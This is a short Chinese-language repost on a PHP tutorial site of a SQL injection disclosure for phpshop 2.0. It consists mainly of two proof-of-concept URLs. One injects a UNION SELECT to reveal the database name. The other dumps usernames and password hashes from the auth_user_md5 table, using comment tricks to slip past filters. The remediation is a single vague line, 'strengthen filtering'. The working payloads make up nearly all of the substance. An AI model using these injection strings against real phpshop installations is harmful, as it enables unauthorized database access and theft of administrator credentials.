网站地图    收藏   

主页 > 后端 > 网站安全 >

phpshop 2.0 SQL注入及修复 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 标题 : phpshop 2.0 SQL Injection Vulnerability作者 : By onestree下载地址 : http://code.google.com/p/phpshop/downloads/list测试地址: windows 7 / ubuntuSQLi p0c:==================htt......

标题 : phpshop 2.0 SQL Injection Vulnerability
作者 : By onestree
下载地址 : http://code.google.com/p/phpshop/downloads/list
测试地址: windows 7 / ubuntu
 
 
SQLi p0c:
 
==================
 
http://www.2cto.com /phpshop 2.0/?page=admin/function_list&module_id=11'
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
 
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--

修复:
加强过滤

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论